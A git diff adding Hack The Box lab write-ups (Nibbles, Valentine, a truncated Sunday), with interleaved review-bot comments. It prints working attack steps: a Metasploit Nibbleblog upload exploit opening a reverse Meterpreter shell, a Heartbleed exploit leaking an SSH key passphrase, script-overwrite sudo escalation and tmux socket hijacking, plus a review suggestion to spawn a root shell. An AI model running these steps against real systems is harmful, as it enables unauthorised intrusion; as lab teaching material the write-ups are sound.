+ ---- --------------- -------- -----------
+ PASSWORD yes The password to authenticate with
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes The base path to the web application
+ USERNAME yes The username to authenticate with
+ VHOST no HTTP server virtual host
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Nibbleblog 4.0.3
+
+
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
+ RHOSTS => 10.10.10.75
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
+ TARGETURI => /nibbleblog/
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME
+ [-] Unknown variable
+ Usage: set [option] [value]
+
+ Set the given option to value. If value is omitted, print the current value.
+ If both are omitted, print options that are currently set.
+
+ If run from a module context, this will set the value in the module
+ datastore. Use -g to operate on the global datastore
+
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
+ USERNAME => admin
+ msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
+ PASSWORD => nibbles
+ msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
+
+
+
+We hit exploit and see what results we can get.
+
+
+ msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Sending stage (38288 bytes) to 10.10.10.75
+ [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.75:47254) at 2019-11-21 09:46:53 +0100
+ [+] Deleted image.php
+ ls
+
+ meterpreter > ls
+ Listing: /var/www/html/nibbleblog/content/private/plugins/my_image
+ ==================================================================
+
+ Mode Size Type Last modified Name
+ ---- ---- ---- ------------- ----
+ 100644/rw-r--r-- 258 fil 2019-11-21 09:47:03 +0100 db.xml
+
+ meterpreter > sysinfo
+ Computer : Nibbles
+ OS : Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64
+ Meterpreter : php/linux
+
+ meterpreter > shell
+ Process 1707 created.
+ Channel 0 created.
+
+ cat /home/nibbler/user.txt
+ b0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+It spawned us a meterpreter session ! We then created a shell , which was logged as the user Nibbler. We have then been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Let's first get a fully interactive shell using the python pty.spawn one liner.
+
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /
+
+ nibbler@Nibbles:/$ ls
+ ls
+ bin home lib64 opt sbin tmp vmlinuz.old
+ boot initrd.img lost+found proc snap usr
+ dev initrd.img.old media root srv var
+ etc lib mnt run sys vmlinuz
+
+
+Let's navigate to /home/nibbler/ and see what we can work with.
+
+
+ nibbler@Nibbles:/$ cd home/nibbler
+ cd home/nibbler
+ nibbler@Nibbles:/home/nibbler$ ls
+ ls
+ personal.zip user.txt
+
+
+There seems to be a zip file here, let's unzip it and see what's inside.
+
+
+ nibbler@Nibbles:/home/nibbler$ unzip personal.zip
+ unzip personal.zip
+ Archive: personal.zip
+ creating: personal/
+ creating: personal/stuff/
+ inflating: personal/stuff/monitor.sh
+
+ nibbler@Nibbles:/home/nibbler$ cd personal/stuff
+ cd personal/stuff
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
+ ls
+ monitor.sh
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -l
+ ls -l
+ total 4
+ -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
+
+
+Here is our opportunity ! the monitor.sh script has got the 777 permissions, meaning that we can run commands of our choice within that script, with root permissions. We will try to print out the root flag by writing into the script the cat command.
+
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ cat /root/root.txt
+ cat: /root/root.txt: Permission denied
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "cat /root/root.txt" > monitor.sh
+ echo "cat /root/root.txt" > monitor.sh
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -u root ./monitor.sh
+ sudo -u root ./monitor.sh
+ sudo: unable to resolve host Nibbles: Connection timed out
+ b6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
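Review bot: the claim at "the monitor.sh script has got the 777 permissions, meaning that we can run commands of our choice within that script, with root permissions" conflates two different things. World-writable permissions only let nibbler edit the file; what makes the edited file run as root is a sudo rule allowing `./monitor.sh` to be executed as root, and the hunk never shows the `sudo -l` output that establishes that rule even though `sudo -u root ./monitor.sh` is run at the end. Add the `sudo -l` listing before the `echo` so the reader sees why overwriting this particular script matters. Also, `echo "cat /root/root.txt" > monitor.sh` destroys the original 4015-byte script; appending with `>>` or copying it aside first is the careful form, and writing `/bin/bash` into it instead of a single `cat` yields a root shell rather than one file read. Two minor points: the `ls` typed before the `meterpreter >` prompt when the session opens is a stray keystroke and can be dropped, and the page gives no source for `admin:nibbles` being a default credential, so say how the password was arrived at rather than calling it "default credentials".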
diff --git a/Easy/17.md b/Easy/17.md
new file mode 100644
index 0000000..12d1367
--- /dev/null
+++ b/Easy/17.md
@@ -0,0 +1,409 @@
+# Valentine Writeup
+
+
+
+## Introduction :
+
+Valentine is an easy Linux box that was released back in Febuary 2018. It features a popular CVE called Heartbleed.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.79
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 18:09 CET
+ Nmap scan report for 10.10.10.79
+ Host is up (0.046s latency).
+ Not shown: 997 closed ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
+ | 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
+ |_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
+ 80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
+ |_http-server-header: Apache/2.2.22 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ 443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
+ |_http-server-header: Apache/2.2.22 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
+ | Not valid before: 2018-02-06T00:45:25
+ |_Not valid after: 2019-02-06T00:45:25
+ |_ssl-date: 2019-11-20T17:09:42+00:00; +10s from scanner time.
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Host script results:
+ |_clock-skew: 9s
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
+
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → sslscan 10.10.10.79
+ _
+ ___ ___| |___ ___ __ _ _ __
+ / __/ __| / __|/ __/ _ | _ \
+ \__ \__ \ \__ \ (_| (_| | | | |
+ |___/___/_|___/\___\__,_|_| |_|
+
+ sslscan version 1.10.2
+ OpenSSL 1.0.2t 10 Sep 2019
+
+
+ Testing SSL server 10.10.10.79 on port 443
+
+
+ Preferred Server Cipher(s):
+ TLSv1 256 bits ECDHE-RSA-AES256-SHA
+ TLS11 256 bits ECDHE-RSA-AES256-SHA
+ TLS12 256 bits ECDHE-RSA-AES256-GCM-SHA384
+
+ SSL Certificate:
+ Certificate blob:
+ -----BEGIN CERTIFICATE-----
+ MIIDZzCCAk+gAwIBAgIJAIXsbfXFhLHyMA0GCSqGSIb3DQEBBQUAMEoxCzAJBgNV
+ BAYTAlVTMQswCQYDVQQIDAJGTDEWMBQGA1UECgwNdmFsZW50aW5lLmh0YjEWMBQG
+ A1UEAwwNdmFsZW50aW5lLmh0YjAeFw0xODAyMDYwMDQ1MjVaFw0xOTAyMDYwMDQ1
+ MjVaMEoxCzAJBgNVBAYTAlVTMQswCQYDVQQIDAJGTDEWMBQGA1UECgwNdmFsZW50
+ aW5lLmh0YjEWMBQGA1UEAwwNdmFsZW50aW5lLmh0YjCCASIwDQYJKoZIhvcNAQEB
+ BQADggEPADCCAQoCggEBAMMoF6z4GSpB0oo/znkcGfT7SPrTLzNrb8ic+aO/GWao
+ oY35ImIO4Z5FUB9ZL6y6lc+vI6pUyWRADyWoxd3LxByHDNJzEi53ds+JSPs5SuH1
+ PUDDtZqCaPaNjLJNP08DCcC6rXRdU2SwV2pEDx+39vsFiK6ywcrepvvFZndGKXVg
+ 0K+R3VkwOguPhSHlXcgiHFbqei8NJ1zip9YuVUYXhyLVG2ZiJYX6CRw4bRsUnql6
+ 4DFNQybOsJHm0JtI2M9PefmvEkTUZeT/d0dWhU076a3bTestKZf4WpqZw60XGmxz
+ pAQf5dWOqMemIK6K4FC48bLSSN59s4kNtuhtx6OCXpcCAwEAAaNQME4wHQYDVR0O
+ BBYEFNzWWyJscuATyFWyfLR2Yev1T435MB8GA1UdIwQYMBaAFNzWWyJscuATyFWy
+ fLR2Yev1T435MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBACc3NjB7
+ cHUXjTxwdeFxkY0EFYPPy3EiHftGVLpiczrEQ7NiHTLGQ6apvxdlShBBhKWRaU+N
+ XGhsDkvBLUWJ3DSWwWM4pG9qmWPT241OCaaiIkVT4KcjRIc+x+91GWYNQvvdnFLO
+ 5CfrRGkFHwJT1E6vGXJejx6nhTmis88ByQ9g9D2NgcHENfQPAW1by7ONkqiXtV3S
+ q56X7q0yLQdSTe63dEzK8eSTN1KWUXDoNRfAYfHttJqKg2OUqUDVWkNzmUiIe4sP
+ csAwIHShdX+Jd8E5oty5C07FJrzVtW+Yf4h8UHKLuJ4E8BYbkxkc5vDcXnKByeJa
+ gRSFfyZx/VqBh9c=
+ -----END CERTIFICATE-----
+ Version: 2
+ Serial Number: 85:ec:6d:f5:c5:84:b1:f2
+ Signature Algorithm: sha1WithRSAEncryption
+ Issuer: /C=US/ST=FL/O=valentine.htb/CN=valentine.htb
+ Not valid before: Feb 6 00:45:25 2018 GMT
+ Not valid after: Feb 6 00:45:25 2019 GMT
+ Subject: /C=US/ST=FL/O=valentine.htb/CN=valentine.htb
+ Public Key Algorithm: rsaEncryption
+ RSA Public Key: (2048 bit)
+ Public-Key: (2048 bit)
+ Modulus:
+ 00:c3:28:17:ac:f8:19:2a:41:d2:8a:3f:ce:79:1c:
+ 19:f4:fb:48:fa:d3:2f:33:6b:6f:c8:9c:f9:a3:bf:
+ 19:66:a8:a1:8d:f9:22:62:0e:e1:9e:45:50:1f:59:
+ 2f:ac:ba:95:cf:af:23:aa:54:c9:64:40:0f:25:a8:
+ c5:dd:cb:c4:1c:87:0c:d2:73:12:2e:77:76:cf:89:
+ 48:fb:39:4a:e1:f5:3d:40:c3:b5:9a:82:68:f6:8d:
+ 8c:b2:4d:3f:4f:03:09:c0:ba:ad:74:5d:53:64:b0:
+ 57:6a:44:0f:1f:b7:f6:fb:05:88:ae:b2:c1:ca:de:
+ a6:fb:c5:66:77:46:29:75:60:d0:af:91:dd:59:30:
+ 3a:0b:8f:85:21:e5:5d:c8:22:1c:56:ea:7a:2f:0d:
+ 27:5c:e2:a7:d6:2e:55:46:17:87:22:d5:1b:66:62:
+ 25:85:fa:09:1c:38:6d:1b:14:9e:a9:7a:e0:31:4d:
+ 43:26:ce:b0:91:e6:d0:9b:48:d8:cf:4f:79:f9:af:
+ 12:44:d4:65:e4:ff:77:47:56:85:4d:3b:e9:ad:db:
+ 4d:eb:2d:29:97:f8:5a:9a:99:c3:ad:17:1a:6c:73:
+ a4:04:1f:e5:d5:8e:a8:c7:a6:20:ae:8a:e0:50:b8:
+ f1:b2:d2:48:de:7d:b3:89:0d:b6:e8:6d:c7:a3:82:
+ 5e:97
+ Exponent: 65537 (0x10001)
+ X509v3 Extensions:
+ X509v3 Subject Key Identifier:
+ DC:D6:5B:22:6C:72:E0:13:C8:55:B2:7C:B4:76:61:EB:F5:4F:8D:F9
+ X509v3 Authority Key Identifier:
+ keyid:DC:D6:5B:22:6C:72:E0:13:C8:55:B2:7C:B4:76:61:EB:F5:4F:8D:F9
+
+ X509v3 Basic Constraints:
+ CA:TRUE
+ Verify Certificate:
+ self signed certificate
+
+
+
+## **Part 2 : Getting User Access**
+
+Port 80 seems to be running Apache 2.2.22, let's run the dirbuster command to try and find out what are the directories we can find.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.79/
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Wed Nov 20 18:14:59 2019
+ URL_BASE: http://10.10.10.79/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.79/ ----
+ + http://10.10.10.79/cgi-bin/ (CODE:403|SIZE:287)
+ + http://10.10.10.79/decode (CODE:200|SIZE:552)
+ ==> DIRECTORY: http://10.10.10.79/dev/
+ + http://10.10.10.79/encode (CODE:200|SIZE:554)
+ + http://10.10.10.79/index (CODE:200|SIZE:38)
+ + http://10.10.10.79/index.php (CODE:200|SIZE:38)
+ + http://10.10.10.79/server-status (CODE:403|SIZE:292)
+
+ ---- Entering directory: http://10.10.10.79/dev/ ----
+ (!) WARNING: Directory IS LISTABLE. No need to scan it.
+ (Use mode '-w' if you want to scan it anyway)
+
+ -----------------
+ END_TIME: Wed Nov 20 18:18:00 2019
+ DOWNLOADED: 4612 - FOUND: 6
+
+
+
+According to dirb, /dev seems to be listable. Let's fire up a web browser to check it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → lynx http://10.10.10.79/
+
+
+ 
+
+We seem to have found a key however it seems to be hexadecimal-encoded. We will first use the curl command with the -s and -k flags to download the encoded key. Then we will use the xxd command with the -r and -p flags to convert the key from hexadecimal to it's original ascii charcaters.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → curl -sk http://10.10.10.79/dev/hype_key > hype_key
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → cat hype_key | xxd -r -p
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
+
+ DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
+ 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
+ 0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
+ Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
+ OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
+ pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
+ QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
+ p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
+ Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
+ t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
+ XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
+ aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+ +wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
+ AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
+ r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
+ 2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
+ e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
+ 09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
+ dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
+ cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
+ pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
+ Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
+ suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
+ l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
+ RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
+ -----END RSA PRIVATE KEY-----
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → cat hype_key | xxd -r -p > Hype.ssh.key
+
+
+Now we have decrypted the hype ssh key and saved it locally as "Hype.ssh.key" As a side note, the header of the ssh key says "Proc-Type" and "DEK-Info" which means that we will probably need a passphrase for the key. When we open the browser at the URL http://10.10.10.79/ we are greeted with an image that is an analogy to the Heartbleed Vulnerability. Let's test if this machine is vulnerable to the well-known Heartbleed vulnerability [(CVE-2014-0160)](https://www.us-cert.gov/ncas/alerts/TA14-098A). To do so we will first off download the according python script heartbleed.py and check how to use it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → curl -sk https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py > heartbleed.py
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → nano heartbleed.py
+
+
+We will run the command using python2 and with the -n flag in order to increase our attempts at getting information from the machine.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → python2 heartbleed.py 10.10.10.79 -n 201
+
+ defribulator v1.16
+ A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
+
+ ##################################################################
+ Connecting to: 10.10.10.79:443, 201 times
+ Sending Client Hello for TLSv1.0
+ Received Server Hello for TLSv1.0
+
+ WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
+ Please wait... connection attempt 201 of 201
+ ##################################################################
+ ).(B...}.@....SC[...r....+..H...9...BlCg==
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.@....SC[...r....+..H...9...
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.@....SC[...r....+..H...9...
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.@....SC[...r....+..H...9...
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.@....SC[...r....+..H...9...
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.......0.0.1/decode.php
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 42
+
+ $text=**aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==**
+
+
+Looking at the results we see that it seems to have returned us a base64-encoded string. We will use the base64 command with the -d flag to decode the encoded string.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
+ heartbleedbelievethehype
+
+
+Now we will try to log onto the box through the ssh service using our decrypted Hype.ssh.key along with the passphrase "heartbleedbelievethehype"
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → ssh -i Hype.ssh.key hype@10.10.10.79
+ The authenticity of host '10.10.10.79 (10.10.10.79)' cant be established.
+ ECDSA key fingerprint is SHA256:lqH8pv30qdlekhX8RTgJTq79ljYnL2cXflNTYu8LS5w.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.79' (ECDSA) to the list of known hosts.
+ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @
+ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+ Permissions 0644 for 'Hype.ssh.key' are too open.
+ It is required that your private key files are NOT accessible by others.
+ This private key will be ignored.
+ Load key "Hype.ssh.key": bad permissions
+
+
+Let's not forget to change the permissions of the SSH key to 600 _(read+write for root and nothing for groups + user)_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → ssh -i Hype.ssh.key hype@10.10.10.79
+ Enter passphrase for key 'Hype.ssh.key':
+ Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com/
+
+ New release '14.04.5 LTS' available.
+ Run 'do-release-upgrade' to upgrade to it.
+
+ Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
+ hype@Valentine:~$ uname -a
+ Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
+
+ hype@Valentine:~$ cat /home/hype/Desktop/user.txt
+ e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+We have been able to print out the flag user, the combination of the SSH key and it's passphrase gave us access to the machine, which logged us as the "hype" user.
+
+## **Part 3 : Getting Root Access**
+
+In order to escalate privileges we will first have to take a look at what we can work with, starting with the .bash_history file.
+
+
+ hype@Valentine:~$ cat .bash_history
+
+ exit
+ exot
+ exit
+ ls -la
+ cd /
+ ls -la
+ cd .devs
+ ls -la
+ tmux -L dev_sess
+ tmux a -t dev_sess
+ tmux --help
+ tmux -S /.devs/dev_sess
+ exit
+
+
+
+seems like the user hype was working with something within a hidden devs directory. Just like in the .bash_history file we will use the ls command with the -a flag in order to list the hidden files and then navigate our way in.
+
+
+ hype@Valentine:~$ cd /
+ hype@Valentine:/$ ls -la
+ total 108
+ drwxr-xr-x 26 root root 4096 Feb 6 2018 .
+ drwxr-xr-x 26 root root 4096 Feb 6 2018 ..
+ drwxr-xr-x 2 root root 4096 Dec 11 2017 bin
+ drwxr-xr-x 3 root root 4096 Feb 16 2018 boot
+ drwxr-xr-x 2 root root 4096 Dec 11 2017 cdrom
+ drwxr-xr-x 13 root root 4060 Nov 20 09:07 dev
+ drwxr-xr-x 2 root root 4096 Dec 13 2017 devs
+ drwxr-xr-x 2 root hype 4096 Nov 20 09:07 .devs
+ drwxr-xr-x 132 root root 12288 Nov 20 09:07 etc
+ drwxr-xr-x 3 root root 4096 Dec 11 2017 home
+ lrwxrwxrwx 1 root root 32 Dec 11 2017 initrd.img -> boot/initrd.img-3.2.0-23-generic
+ drwxr-xr-x 21 root root 4096 Dec 11 2017 lib
+ drwxr-xr-x 2 root root 4096 Apr 25 2012 lib64
+ drwx------ 2 root root 16384 Dec 11 2017 lost+found
+ drwxr-xr-x 3 root root 4096 Apr 25 2012 media
+ drwxr-xr-x 3 root root 4096 Dec 11 2017 mnt
+ drwx------ 2 root root 4096 Dec 13 2017 opt
+ dr-xr-xr-x 92 root root 0 Nov 20 09:07 proc
+ drwx------ 4 root root 4096 Feb 6 2018 root
+ drwxr-xr-x 20 root root 740 Nov 20 10:02 run
+ drwxr-xr-x 2 root root 4096 Feb 16 2018 sbin
+ drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux
+ drwxr-xr-x 2 root root 4096 Apr 25 2012 srv
+ drwxr-xr-x 13 root root 0 Nov 20 09:07 sys
+ drwxrwxrwt 5 root root 4096 Nov 20 10:08 tmp
+ drwxr-xr-x 10 root root 4096 Apr 25 2012 usr
+ drwxr-xr-x 14 root root 4096 Feb 6 2018 var
+ lrwxrwxrwx 1 root root 29 Dec 11 2017 vmlinuz -> boot/vmlinuz-3.2.0-23-generic
+ hype@Valentine:/$ cd .devs
+ hype@Valentine:/.devs$ ls
+ dev_sess
+
+
+let's simply reproduce the steps that hype was doing, which apparently was an attempt at attaching the socket to the dev_sess file
+
+
+ hype@Valentine:/.devs$ ls -l
+ total 0
+ srw-rw---- 1 root hype 0 Nov 20 09:07 dev_sess
+
+
+it seems like the dev_sess file is owned by root, let's attach the tmux session ourselves, and it should give us a root shell.
+
+
+ hype@Valentine:/.devs$ tmux -S dev_sess
+
+ root@Valentine:/.devs# id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ root@Valentine:/.devs# cat /root/root.txt
+ f1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
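Review bot: the explanation at `let's simply reproduce the steps that hype was doing, which apparently was an attempt at attaching the socket to the dev_sess file` misstates what `tmux -S` does and skips the reason the escalation works. `-S dev_sess` tells the tmux client which server socket to connect to; the listing `srw-rw---- 1 root hype 0 Nov 20 09:07 dev_sess` shows a socket owned by root but readable and writable by group `hype`, so any member of that group can connect to the root-owned tmux server already running behind it and inherit its root shell. Suggest rewording to say that the group permission bits, not the root owner shown by `ls -l`, are what grant access: a socket with mode `srw-------` would give `hype` nothing. Also, `Here we can see the progress graph :` is followed only by blank lines, with no image reference, so the conclusion renders empty; either restore the image link or drop the caption (the same dangling caption appears in the other writeups in this patch).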
diff --git a/Easy/18.md b/Easy/18.md
new file mode 100644
index 0000000..6a7c0ee
--- /dev/null
+++ b/Easy/18.md
@@ -0,0 +1,316 @@
+# Sunday Writeup
+
+
+
+## Introduction :
+
+Sunday is an easy Solaris box that was released back in April 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ **λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV -Pn 10.10.10.76**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 05:36 CET
+ Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
+ NSE Timing: About 75.00% done; ETC: 05:38 (0:00:00 remaining)
+ Nmap scan report for 10.10.10.76
+ Host is up (0.037s latency).
+ Not shown: 991 closed ports
+ PORT STATE SERVICE VERSION
+ **79/tcp open finger Sun Solaris fingerd
+ |_finger: No one logged on\x0D**
+ 111/tcp open rpcbind
+ 765/tcp filtered webster
+ 1839/tcp filtered netopia-vo1
+ 1998/tcp filtered x25-svc-port
+ 2910/tcp filtered tdaccess
+ 9011/tcp filtered d-star
+ 16018/tcp filtered unknown
+ 54045/tcp filtered unknown
+ Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 117.78 seconds
+
+
+Seems like we have alot of ports to work with. let's run another nmap scan, but this time to enumerate all the 65535 ports.
+
+
+ **λ nihilist [ 10.10.14.48/23 ] [~] → nmap -T4 -A -v -p- 10.10.10.76**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 05:37 CET
+ NSE: Loaded 151 scripts for scanning.
+ NSE: Script Pre-scanning.
+ Initiating NSE at 05:37
+ Completed NSE at 05:37, 0.00s elapsed
+ Initiating NSE at 05:37
+ Completed NSE at 05:37, 0.00s elapsed
+ Initiating NSE at 05:37
+ Completed NSE at 05:37, 0.00s elapsed
+ Initiating Ping Scan at 05:37
+ Scanning 10.10.10.76 [2 ports]
+ Completed Ping Scan at 05:37, 0.03s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 05:37
+ Completed Parallel DNS resolution of 1 host. at 05:37, 0.01s elapsed
+ Initiating Connect Scan at 05:37
+ Scanning 10.10.10.76 [65535 ports]
+ Discovered open port 111/tcp on 10.10.10.76
+ Increasing send delay for 10.10.10.76 from 0 to 5 due to 197 out of 492 dropped probes since last increase.
+ Increasing send delay for 10.10.10.76 from 5 to 10 due to max_successful_tryno increase to 5
+ Warning: 10.10.10.76 giving up on port because retransmission cap hit (6).
